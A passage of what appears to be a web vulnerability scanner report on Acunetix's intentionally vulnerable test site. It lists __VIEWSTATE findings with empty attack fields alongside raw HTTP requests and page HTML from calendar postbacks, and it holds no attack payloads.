style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8201&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAnP1hTtoIZGRkZZUxCRONjHocGnbEGcEFNMQg4SI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKNoo%2BCDgK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9scdFA9c3QUMguSaPOnbB%2FPuLdxw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:57 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAAnP1hTtoIZGRkZZUxCRONjHocGnbEGcEFNMQg4SI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKNoo+CDgK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9scdFA9c3QUMguSaPOnbB/PuLdxw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:White" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8189&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAApwD0RNoIZGRko%2F9WKC0a0Nue3SIcU8b%2BvlYV2KM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMrcp7Arrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD%2B5WlYFYHksJgTjLKRYaJlqhFOFr
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:17 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAApwD0RNoIZGRko/9WKC0a0Nue3SIcU8b+vlYV2KM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMrcp7Arrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD+5WlYFYHksJgTjLKRYaJlqhFOFr" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:White" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" 